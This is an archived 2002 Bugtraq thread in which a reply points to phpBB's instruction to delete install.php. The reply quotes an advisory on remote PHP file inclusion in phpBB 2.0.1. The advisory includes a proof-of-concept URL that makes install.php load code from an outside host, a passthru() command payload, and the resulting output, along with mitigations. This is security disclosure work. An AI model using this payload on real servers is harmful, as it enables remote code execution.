Home page logo

bugtraq logo Bugtraq mailing list archives

RE: malicious PHP source injection in phpBB
From: "Nathan Anderson" <nathan () andersonsplace net>
Date: Mon, 17 Jun 2002 17:49:33 -0700


        The install instructions tells you to DELETE the install.php.  :)

Quoting the Installing instructions (INSTALL.html)

"6. Important post-Install tasks for all installation methods
Once you have succssfully installed phpBB 2.0.0 you MUST ensure you remove
install.php, upgrade.php and update_to_FINAL.php files. Leaving these in
place is a very serious potential security issue. Additionally you may
delete the db/schemas, docs/ and contrib/ directories if you wish.

With these files deleted you should proceed to the administration panel.
Depending on how the installation completed you may have been directed there
automatically. If not, login as the administrator you specified during
install/upgrade and click the "Administration Panel" link at the bottom of
any page. Ensure that details specified in General -> Configuration are


-----Original Message-----
From: morris Chang [mailto:onlooker () cnun xsdeny net]
Sent: Sunday, June 16, 2002 6:30 AM
To: bugtraq () securityfocus com
Subject: malicious PHP source injection in phpBB

JCC Security Advisory
June 16, 2002

malicious PHP source injection in phpBB


phpBB is one of popular PHP bulletin board systems.
When allow_url_fopen = On and register_globals = On in php.ini, phpBB has
vulnerability because install.php contains dangerous codes.
So an attacker can include any files into server's PHP codes.


It's tested on phpBB 2.0.1. but I think all of phpBB 2 is affected.


allow_url_fopen = off and register_globals = off.
and if complete install remove or rename install.php.
Or in install.php
define('IN_PHPBB', true);
Put it

Good idea to code that <<PHP_CODE
ini_set("register_globals", "Off");
ini_set ("allow_url_fopen", "Off");

Tested systems

phpBB 2.0.1 Debian GNU/Linux SID(x86)


We checked the vulnerability with
"http://URL/install.php?phpbb_root_dir=WANTED_TO_INCLUDE"; and
 made a sample code, functions_selects.php,

<? passthru("uname -a"); ?>

and type the following URL to invoke this sample code.

TEST URL : http://URL/install.php?phpbb_root_dir=http://MYBOX/";

-------out put----------------------------
Linux cpu 2.4.18-686 #1 Sun Apr 14 11:32:47 EST 2002 i686 unknown
Warning: Cannot add header information - headers already sent by (output
started at in
/home/morris/public_html/tmp/phpBB2/includes/sessions.php on line 182

Warning: Cannot add header information - headers already sent by (output
started at in
/home/morris/public_html/tmp/phpBB2/includes/sessions.php on line 183

Warning: Cannot add header information - headers already sent by (output
started at in
/home/morris/public_html/tmp/phpBB2/install.php on line 346

thx for BlackKnight at r0ar
http://jcc.hackerslab.org(at morris Chang)

e-mail : morris () xsdeny net

  By Date           By Thread  

Current thread:
[ Nmap | Sec Tools | Mailing Lists | Site News | About/Contact | Advertising | Privacy ]